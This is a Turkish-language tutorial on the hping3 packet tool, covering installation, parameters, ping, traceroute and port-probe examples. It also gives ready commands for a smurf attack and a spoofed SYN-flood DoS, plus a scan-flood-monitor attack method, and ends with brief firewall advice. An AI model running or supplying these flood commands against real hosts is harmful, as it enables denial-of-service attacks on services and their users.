Bu yazımda sizlerle hping3 aracının kullanımı hakkında bilgi vereceğim. Hping3’ü, ping’in gelişmiş versiyonu olarak tanımlayabiliriz. hping3 aracı ile meşhur ping programında olduğu gibi hedef IP adresine paketler göndermeye yarar. Bu araç sadece ICMP değil TCP, UDP, Raw-IP gibi protokolleri desteklemektedir. hping3 aracı ile istediğimiz kriterlere göre paketler oluşturup hedef IP adresine gönderebiliriz, hatta DOS atak bile gerçekleştirebilirsiniz. Bu aracı ağ testleri yaparken veya saldırı düzenlerken kullanabiliriz.

Hping3 Kurulumu

Normal şartlarda Hping3 bazı linux sürümlerinin içerisinde önceden yüklenmiş halde bulunur. Örneğin ben Kali Linux kullanıyorum ve Hping3’ü yüklemek için herhangi bir şey yapmadım. Sizde öncelikle linux sürümünüzde Hping3 bulunup bulunmadığını komut satırına “hping3 -v” yazarak kontrol edebilirsiniz. Eğer “bash: hping3: command not found” gibi bir hata alıyorsanız aşağıdaki adımları takip ederek hping3’ü linux makinenize kurmanız gerekecektir. Herhangi bir hata almıyorsanız aşağıdakine benzer bir ekran çıktısı göreceksiniz.

Kurulum için terminalde bu komutları yazarak hping3’ü makinenize kurabilirsiniz.

# sudo apt-get update
# sudo apt-get install hping3

Hping3 Kullanımı

En genel kullanımıyla “hping3 –syn -p 80 http://www.google.com –spoof 4.4.4.4” şeklinde 80 portu için 5.5.5.5 ip adresi üzerinden http://www.google.com adresine istek yapmak için kullanabiliriz. Komutun farklı parametrelerini nasıl kullanacağımızı aşağıda detaylıca inceleyelim ve sizin için en uygun olan parametreleri kullarak farklı komut satırlarını nasıl oluşturacağınızı görelim. Son olarak nasıl bir DOS saldırısı yapılabileceğini ve bu araç ile yapılan DOS saldırılarından nasıl korunacağınıza deyinerek yazımızı bitirelim.

Parametreler
-h –help –> araç kullanımı ve komut parametrelerini listeler.
-v –version –> aracınızın versiyon numarasını verir.
-c –count –> paketleri sayar
-i –interval –> bekleme (1000 milisaniye bekleme süresi, Kullanımı -i u1000)
–fast –> -i u10000 için (saniyede 10 paket)
–faster –> -i u1000 (saniyede 100 paket)
–flood –> paketleri mümkün olduğu kadar hızlı yolla. Cevapları gösterme.
-n –numeric –>nümerik çıktı
-q –quiet –> sessiz mod
-I –interface –> arayüz adı
-V –verbose –> verbose modu
-D –debug –> hata ayıklama bilgisi
-z –bind –> ctrl+z’ den ttl’ bind
-Z –unbind –>unbind ctrl+z
–beep –>her eşleşen paket için bip sesi
Modlar
default mode yani varsayılan = TCP’dir ve mod belirtmezsek araç TCP trafiği oluşturur.
-0 veya —rawip –> RAW IP
-1 veya –icmp –> ICMP
-2 veya —udp –> UDP
-8 veya –scan –> SCAN
-9 veya –listen –> listen
IP parametreleri
-a –spoof –> kaynak adresin spoof’u
–rand-dest –> rastgele hedef adres modu
–rand-source –> rastgele kaynak adres modu
-t –ttl –> ttl (default 64)
-N –id –> id (default rastgele)
-W –winid –> win id bayt sırasını kullan
-r –rel –> id alanını ilişkilendir(host trafiğini tahmin etmek için)
-f –frag –> daha fazla parça halinde bölünmüş paketler. (zayıf acl geçebilir)
-x –morefrag –> daha fazla fragments flag koy
-y –dontfrag –> fragment flag koyma
-g –fragoff –> fragment offset koy
-m –mtu –> sanal mtu ayarla, paket büyüklüğü > mtu ise –frag
-o –tos –> hizmet türü (varsayılan 0x00)
-G –rroute –> RECORD_ROUTE seçeneğini içerir ve rota arabelleğini görüntüler
–lsrr –> gevşek kaynak yönlendirme ve kayıt yolu
–ssrr –> katı kaynak yönlendirme ve kayıt yolu
-H –ipproto –> IP protokol alanını sadece RAW IP modunda ayarla
Yaygın Kullanım Örnekleri
1) ICMP Testi: Bu örnekte hping3, normal bir ping programı gibi davranacak, ICMP-echo gönderecek ve ICMP-yanıtı alacak.
# hping3 -1 google.com
2) ICMP kullanarak Traceroute: Bu örnekte, TTL değerinin her birinde 1 kez artan ICMP paketlerini kimlerin kullanandığını tracert (windows) veya traceroute (linux) komutları gibi benzer şekilde verir.
# hping3 –traceroute -V -1 google.com
3) Port denetleme: Bu örnekte hping3 bir Syn paketini belirtilen bir port noktasına gönderir (örneğimizde 80 portu). Hangi yerel porttan taramayı başlatacağını 5050 üzerinden kontrol edebiliriz.
# hping3 -V -S -p 80 -s 5050 google.com
4) Smurf Saldırısı: Bu örnekte, sahte ping mesajı yayını yoluyla hedef sisteme gönderilen bir çeşit DOS atak tipidir.
# hping3 -1 –flood -a Hedef_IP Yayın_Adresi
5) DOS Saldırısı: Bu örnekte, basit bir DOS saldırısı için aracın nasıl kullanıldığı gösterilmektedir.
# hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 –flood –rand-source Hedef_IP
Saldırı Metodolojisi ve Saldırıdan Korunma Yolu
Bu aracı kullanacağınız zaman aşağıdaki adımları izlemeniz gerekmektedir.

  1. Adım: nmap ile açık olan portların tespitini yapacaksınız. (nmap x.x.x.x)
  2. Adım: Açık olan portlardan birine hping3 programı ile TCP trafiği göndereceksiniz. (hping3 -c 10 -d 1200 -S -p 445  –flood  –rand-source x.x.x.x)
  3. Adım: tcpdump ile gönderdiğiniz trafiği izleyeceksiniz. (tcpdump dst host x.x.x.x and tcp)

Saldırı yapılan bilgisayarda CPU kullanımının %100’lere vardığını göreceksiniz. Bu da aşırı kaynak tüketimi sebebiyle hedefteki makinenin işlem yapamaz hale gelmesiyle sonuçlanmaktadır. Bu araçla yapılabilecek olan saldırılardan korunmak için eğer windows işletim sistemi kullanıyorsanız Güvenlik duvarını etkin hale getirmeniz gerekmektedir. Saldırgan nmap taraması gerçekleştirdiğinde güvenlik duvarınız açık olduğu için açık portlarınızı tespit edemeyecektir. Linux bir işletim sistemi kullanıyorsanız en basitinden port trafiğini kontrol etmek için bir firewall kurmanızda fayda var.